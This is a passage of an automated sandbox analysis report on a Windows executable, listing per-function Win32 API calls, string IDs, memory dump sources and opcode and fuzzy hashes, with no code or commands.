        • GetDlgCtrlID.USER32(?), ref: 0024385D
        • GetWindowRect.USER32(?,?), ref: 00243882
        • GetParent.USER32(?), ref: 002438A0
        • ScreenToClient.USER32(00000000), ref: 002438A7
        • GetClassNameW.USER32(?,?,00000100), ref: 00243921
        • GetWindowTextW.USER32(?,?,00000400), ref: 0024395D
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
        • String ID: %s%u
        • API String ID: 4010501982-679674701
        • Opcode ID: 053eb84edf21bee58a337f65d20706484f4bb046048046f336ffe994cdeb0397
        • Instruction ID: 8df29cd195519971a16bcf3fc1ddcc06de49954039aa2b7645a2ae8365b55829
        • Opcode Fuzzy Hash: 053eb84edf21bee58a337f65d20706484f4bb046048046f336ffe994cdeb0397
        • Instruction Fuzzy Hash: DA91AE71224707AFD71DDF24C885BAAF7A8FF44350F108629F99AC2190DB30EA65CB91
        APIs
        • GetClassNameW.USER32(?,?,00000400), ref: 00244994
        • GetWindowTextW.USER32(?,?,00000400), ref: 002449DA
        • _wcslen.LIBCMT ref: 002449EB
        • CharUpperBuffW.USER32(?,00000000), ref: 002449F7
        • _wcsstr.LIBVCRUNTIME ref: 00244A2C
        • GetClassNameW.USER32(00000018,?,00000400), ref: 00244A64
        • GetWindowTextW.USER32(?,?,00000400), ref: 00244A9D
        • GetClassNameW.USER32(00000018,?,00000400), ref: 00244AE6
        • GetClassNameW.USER32(?,?,00000400), ref: 00244B20
        • GetWindowRect.USER32(?,?), ref: 00244B8B
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
        • String ID: ThumbnailClass
        • API String ID: 1311036022-1241985126
        • Opcode ID: a23469a25cc01adc123fc5c8f2816547bcff7b8d2ba922286b39208bdc0feb93
        • Instruction ID: 0a7a9676884e44cb655b9afdb5ca3a17314eda45bc3354b11463501f3c743d1c
        • Opcode Fuzzy Hash: a23469a25cc01adc123fc5c8f2816547bcff7b8d2ba922286b39208bdc0feb93
        • Instruction Fuzzy Hash: 3B91C0714242069FDB08EF14C985FAA77E8FF84718F04846AFD859A096DB30ED65CFA1
        APIs
          • Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2
        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00278D5A
        • GetFocus.USER32 ref: 00278D6A
        • GetDlgCtrlID.USER32(00000000), ref: 00278D75
        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00278E1D
        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00278ECF
        • GetMenuItemCount.USER32(?), ref: 00278EEC
        • GetMenuItemID.USER32(?,00000000), ref: 00278EFC
        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00278F2E
        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00278F70
        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00278FA1
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
        • String ID: 0
        • API String ID: 1026556194-4108050209
        • Opcode ID: e9761d8ab3025ea5ebd871fd12bfbe978e261a6aef019d5615685979744c1f86
        • Instruction ID: a8707dbcec61d9037951120cab329c835f4241606fe174e8900684cf7eff3dd0
        • Opcode Fuzzy Hash: e9761d8ab3025ea5ebd871fd12bfbe978e261a6aef019d5615685979744c1f86
        • Instruction Fuzzy Hash: E881BF715583029FD720CF24D888AAB7BE9FF88354F14891DF98C97291DB71D960CBA2
        APIs
        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0024DC20
        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0024DC46
        • _wcslen.LIBCMT ref: 0024DC50
        • _wcsstr.LIBVCRUNTIME ref: 0024DCA0
        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0024DCBC
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
        • API String ID: 1939486746-1459072770
        • Opcode ID: 0e79dad09ebbc3fb62025ed9da1ce3254d987729a53396267e240f16174766ce
        • Instruction ID: ad6e795160661c6cfe6674fbb057fa4332f4cd0626a71c2ad297a29f3d26e1f4
        • Opcode Fuzzy Hash: 0e79dad09ebbc3fb62025ed9da1ce3254d987729a53396267e240f16174766ce
        • Instruction Fuzzy Hash: 18411672960305BADB08AB74DC47EBF77ACEF52710F14406AF905A61C3EB7499218BA4
        APIs
        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0026CC64
        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0026CC8D
        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0026CD48
          • Part of subcall function 0026CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0026CCAA
          • Part of subcall function 0026CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0026CCBD
          • Part of subcall function 0026CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0026CCCF
          • Part of subcall function 0026CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0026CD05
          • Part of subcall function 0026CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0026CD28
        • RegDeleteKeyW.ADVAPI32(?,?), ref: 0026CCF3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
        • String ID: RegDeleteKeyExW$advapi32.dll
        • API String ID: 2734957052-4033151799
        • Opcode ID: 8847177f690e5fbb838b0a5ca972336c761c3e26593a40d668a8f5563d65a96e
        • Instruction ID: f553a6d363fbf4a7a883c75d6a5e897b5d6669543f5a15a8b96a57513eeed331
        • Opcode Fuzzy Hash: 8847177f690e5fbb838b0a5ca972336c761c3e26593a40d668a8f5563d65a96e
        • Instruction Fuzzy Hash: D0316071911129BBD720AF64DC8CEFFBB7CEF46750F200169A949E2240DB749A85DAE0
        APIs
        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00253D40
        • _wcslen.LIBCMT ref: 00253D6D
        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00253D9D
        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00253DBE
        • RemoveDirectoryW.KERNEL32(?), ref: 00253DCE
        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00253E55
        • CloseHandle.KERNEL32(00000000), ref: 00253E60
        • CloseHandle.KERNEL32(00000000), ref: 00253E6B
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
        • String ID: :$\$\??\%s
        • API String ID: 1149970189-3457252023
        • Opcode ID: d5c0c3c864e9475daad98dac4dcfd24ee643172d61507b17bb1792e25e6a6ed5
        • Instruction ID: 56dd548ac602003b8f791e6a91c786344a8f300779748c1c4f1ce042b66aab0e
        • Opcode Fuzzy Hash: d5c0c3c864e9475daad98dac4dcfd24ee643172d61507b17bb1792e25e6a6ed5
        • Instruction Fuzzy Hash: 0631857251021AABDB21DFA0DC49FEB37BCEF89741F1041B9F909D6051E77497988B24
        APIs
        • timeGetTime.WINMM ref: 0024E6B4
          • Part of subcall function 001FE551: timeGetTime.WINMM(?,?,0024E6D4), ref: 001FE555
        • Sleep.KERNEL32(0000000A), ref: 0024E6E1
        • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0024E705
        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0024E727
        • SetActiveWindow.USER32 ref: 0024E746
        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0024E754
        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0024E773
        • Sleep.KERNEL32(000000FA), ref: 0024E77E
        • IsWindow.USER32 ref: 0024E78A
        • EndDialog.USER32(00000000), ref: 0024E79B
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
        • String ID: BUTTON
        • API String ID: 1194449130-3405671355
        • Opcode ID: 1aefa4665d421fa79532817985be01ac1e069d726b8e00b07cceae343c11be9f
        • Instruction ID: 8ac0b99b8889afc3b7d3471fc8608602fff3b99f1ba5c072c5100f1aa81ae5bf
        • Opcode Fuzzy Hash: 1aefa4665d421fa79532817985be01ac1e069d726b8e00b07cceae343c11be9f
        • Instruction Fuzzy Hash: 14219FB0A10305EFFF085F30FCCEA257B6DF755799F611528F90A811A1DB71ACA48A24
        APIs
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0024EA5D
        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0024EA73
        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0024EA84
        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0024EA96
        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0024EAA7
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: SendString$_wcslen
        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
        • API String ID: 2420728520-1007645807
        • Opcode ID: ef9c91b8483e1a7db702451b11622ac463aa4d2c1a9904f25896b87b83c69631
        • Instruction ID: 992e2d68d6efc4337bfe8f8b1871a91582013d44dec0c874e3d1fcb8eb64ba33
        • Opcode Fuzzy Hash: ef9c91b8483e1a7db702451b11622ac463aa4d2c1a9904f25896b87b83c69631
        • Instruction Fuzzy Hash: 08115431A6026A7AE724A7A2DC4EDFF6A7CFBD3B00F4504297411A20D1EF704955C5B0
        APIs
        • GetDlgItem.USER32(?,00000001), ref: 00245CE2
        • GetWindowRect.USER32(00000000,?), ref: 00245CFB
        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00245D59
        • GetDlgItem.USER32(?,00000002), ref: 00245D69
        • GetWindowRect.USER32(00000000,?), ref: 00245D7B
        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00245DCF
        • GetDlgItem.USER32(?,000003E9), ref: 00245DDD
        • GetWindowRect.USER32(00000000,?), ref: 00245DEF
        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00245E31
        • GetDlgItem.USER32(?,000003EA), ref: 00245E44
        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00245E5A
        • InvalidateRect.USER32(?,00000000,00000001), ref: 00245E67
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$ItemMoveRect$Invalidate
        • String ID:
        • API String ID: 3096461208-0
        • Opcode ID: 1c15387e121d80bf4e91902ee933ef01663a91cf298a3dffd89e4ab6ab8357d6
        • Instruction ID: f77259556da5e231978ac5f88864c3e841fac6d631720d484db15c5dde590684
        • Opcode Fuzzy Hash: 1c15387e121d80bf4e91902ee933ef01663a91cf298a3dffd89e4ab6ab8357d6
        • Instruction Fuzzy Hash: 53512E70B10615AFDB18CF68DD89AAEBBB9FF88310F248129F519E6291D7709E50CB50
        APIs
          • Part of subcall function 001F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001F8BE8,?,00000000,?,?,?,?,001F8BBA,00000000,?), ref: 001F8FC5
        • DestroyWindow.USER32(?), ref: 001F8C81
        • KillTimer.USER32(00000000,?,?,?,?,001F8BBA,00000000,?), ref: 001F8D1B
        • DestroyAcceleratorTable.USER32(00000000), ref: 00236973
        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,001F8BBA,00000000,?), ref: 002369A1
        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,001F8BBA,00000000,?), ref: 002369B8
        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,001F8BBA,00000000), ref: 002369D4
        • DeleteObject.GDI32(00000000), ref: 002369E6
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
        • String ID:
        • API String ID: 641708696-0
        • Opcode ID: 3d5bef2129a1ecd4419f1f00edb9e23c1ed55d8bd0bb659360759307f61b1304
        • Instruction ID: 925c3bd001264a198a3b5cdd2e75e33355f46ccbc8fa981b2abfbbfcdbd4d7a5
        • Opcode Fuzzy Hash: 3d5bef2129a1ecd4419f1f00edb9e23c1ed55d8bd0bb659360759307f61b1304
        • Instruction Fuzzy Hash: 1261AB70512A09EFDB259F24E95CB75B7F1FB40312F64861CE2469B960CB31A9E0CFA0
        APIs
          • Part of subcall function 001F9944: GetWindowLongW.USER32(?,000000EB), ref: 001F9952
        • GetSysColor.USER32(0000000F), ref: 001F9862
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ColorLongWindow
        • String ID:
        • API String ID: 259745315-0
        • Opcode ID: 8648196932e8a40dd6115a1fa88e7380c89fa1be7417d2bec7b87a7d786f7c20
        • Instruction ID: c422993d01e9da16e03abd9e20365b1dcc9410c7a92361e03af38e7cedb8d3ed
        • Opcode Fuzzy Hash: 8648196932e8a40dd6115a1fa88e7380c89fa1be7417d2bec7b87a7d786f7c20
        • Instruction Fuzzy Hash: 0541E771104648AFDF346F38AC88BB93B65FB46370F654619FAA6872E1C7319D82DB10
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID: .
        • API String ID: 0-2462612998
        • Opcode ID: be506b8f11cb014bd21374033702a805d6fde1af10cf6d9c8be2fd899b64bdda
        • Instruction ID: 09883a12624fe1ca96e9d432221d4327ebb596dcd88271693ef816b39082cc33
        • Opcode Fuzzy Hash: be506b8f11cb014bd21374033702a805d6fde1af10cf6d9c8be2fd899b64bdda
        • Instruction Fuzzy Hash: DDC1E474A243499FDB21DFA8D894BEDBBF0AF29310F144199F81497292C77189E1CF60
        APIs
        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0022F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00249717
        • LoadStringW.USER32(00000000,?,0022F7F8,00000001), ref: 00249720
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0022F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00249742
        • LoadStringW.USER32(00000000,?,0022F7F8,00000001), ref: 00249745
        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00249866
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: HandleLoadModuleString$Message_wcslen
        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
        • API String ID: 747408836-2268648507
        • Opcode ID: 9c9a8f7d5065a6401e2d29fc1e8aa2763e5cbb03556ba7c37090a2a375bb725e
        • Instruction ID: 5b529dbe71e47a10e90036d4fc38e2f7d1a8148a2c0f45bb99d9a88fd89282fb
        • Opcode Fuzzy Hash: 9c9a8f7d5065a6401e2d29fc1e8aa2763e5cbb03556ba7c37090a2a375bb725e
        • Instruction Fuzzy Hash: 24415E72800649ABCF18FBE1DD86DEEB778AF65340F600065F60572092EB356F99CB61
        APIs
          • Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A
        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002407A2
        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002407BE
        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002407DA
        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00240804
        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0024082C
        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00240837
        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0024083C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
        • API String ID: 323675364-22481851
        • Opcode ID: 4f6a57d70040d9960290a5181080fe53411d8b79a87f0dd9c4e839b6b107173d
        • Instruction ID: 4e501eb67a41ffdb2377e149a93dc3c1f406a55f5cf08da8f9a9e48c71c87cab
        • Opcode Fuzzy Hash: 4f6a57d70040d9960290a5181080fe53411d8b79a87f0dd9c4e839b6b107173d
        • Instruction Fuzzy Hash: 0C415872C10629ABCF25EFA1DC89CEEB778FF54350F544129E901A7161EB30AE54CBA0
        APIs
        • VariantInit.OLEAUT32(?), ref: 00263C5C
        • CoInitialize.OLE32(00000000), ref: 00263C8A
        • CoUninitialize.OLE32 ref: 00263C94
        • _wcslen.LIBCMT ref: 00263D2D
        • GetRunningObjectTable.OLE32(00000000,?), ref: 00263DB1
        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00263ED5
        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00263F0E
        • CoGetObject.OLE32(?,00000000,0027FB98,?), ref: 00263F2D
        • SetErrorMode.KERNEL32(00000000), ref: 00263F40
        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00263FC4
        • VariantClear.OLEAUT32(?), ref: 00263FD8
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
        • String ID:
        • API String ID: 429561992-0
        • Opcode ID: bc14cc11341959b6699686a22afc9324fb55231955038b8737849efe32a2553e
        • Instruction ID: 0bbd7fb6de2896df300ebebc0528f6d0940bff0f57d8abd72000b5e8fa21e46b
        • Opcode Fuzzy Hash: bc14cc11341959b6699686a22afc9324fb55231955038b8737849efe32a2553e
        • Instruction Fuzzy Hash: F3C166716183019FD700DF68C88492BB7E9FF89744F10492DF98A9B251D731EE95CB62
        APIs
